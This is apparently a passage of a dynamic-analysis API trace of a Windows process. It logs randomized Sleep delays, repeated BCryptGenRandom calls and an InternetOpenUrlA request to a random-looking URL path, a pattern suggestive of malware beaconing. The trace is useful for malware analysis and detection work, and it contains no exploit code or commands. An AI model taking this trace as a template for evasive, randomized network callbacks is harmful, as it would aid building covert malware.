[0238.625] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0238.625] Sleep (dwMilliseconds=0x1c32d) [0238.890] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0238.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.891] GetProcessHeap () returned 0x440000 [0238.891] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5970 [0238.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0238.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5971, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x4f5971) returned 0x0 [0238.891] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.892] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.893] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0238.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.895] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.895] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0238.895] GetProcessHeap () returned 0x440000 [0238.895] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0238.895] lstrcpyA (in: lpString1=0x473560, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0238.895] lstrcatA (in: lpString1="\x81\x03", lpString2="/Nixnlm9km3bs36nMfJTpmM/" | out: lpString1="\x81\x03/Nixnlm9km3bs36nMfJTpmM/") returned="\x81\x03/Nixnlm9km3bs36nMfJTpmM/" [0238.895] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0238.895] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/Nixnlm9km3bs36nMfJTpmM/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0238.895] GetProcessHeap () returned 0x440000 [0238.895] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0238.895] GetProcessHeap () returned 0x440000 [0238.895] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5970 | out: hHeap=0x440000) returned 1 [0238.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0238.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0238.896] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0238.896] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0238.896] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0238.896] Sleep (dwMilliseconds=0xff61) [0239.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0239.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.123] GetProcessHeap () returned 0x440000 [0239.123] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17ca0 [0239.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17ca1, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a17ca1) returned 0x0 [0239.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.125] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.126] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.127] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0239.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17cc6, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a17cc6) returned 0x0 [0239.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0239.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17cde, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a17cde) returned 0x0 [0239.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0239.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0239.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0239.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 